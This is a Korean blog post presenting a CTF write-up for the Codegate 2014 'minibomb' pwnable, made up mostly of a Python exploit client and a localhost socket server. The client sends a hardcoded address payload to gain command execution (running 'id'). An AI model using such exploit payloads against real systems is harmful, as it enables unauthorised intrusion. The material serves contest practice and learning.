cdor1's lab
Codegate 2014 Quals minibomb 본문
후기 : 로우레벨에서 이뤄지는 익스플로잇에 매우 익숙치 못하고 접해본적도 pwnable.kr otp 이후로 처음이라서
More Smoked Leet Chicken팀의 write-up를 참고했다.
-bombclient.py & bombserver.py-
############ bombclient.py ############
from sys import *
from socket import *
from subprocess import *
from pwn import *
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost',1234))
s.setblocking(0)
sleep(5)
f_len = eval(sys.argv[1])
s.sendall("A" * f_len)
p = Popen('strace -if ./minibomb', shell=True, stdin=PIPE, stdout=s)
pay = "A"*16
pay += p32(0x55557c91)
pay += p32(0x11)
pay += p32(0x08049150)
pay += p32(0x08048143)
pay += "A"*16
pay += p32(0x55557c91)
pay += p32(0)
pay += p32(0)
pay += p32(0x080480b4)
p.stdin.write(pay)
sleep(1000)
############ bombserver.py ############
from socket import *
from pwn import *
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1234))
s.listen(100)
while True:
s, fs = s.accept()
s.sendall('id'.ljust(11, '\x00'))
sleep(10)
s.close()
'Security > Pwnable' 카테고리의 다른 글
| Defcon23 Quals r0pbaby (0) | 2016.09.19 |
|---|---|
| codegate 2015 yocto (0) | 2016.09.15 |
| Plaid CTF 2015 ebp (0) | 2016.09.10 |
| Plaid CTF 2014 ezhp (0) | 2016.09.10 |
| Plaid CTF 2014 kappa (0) | 2016.09.04 |
Comments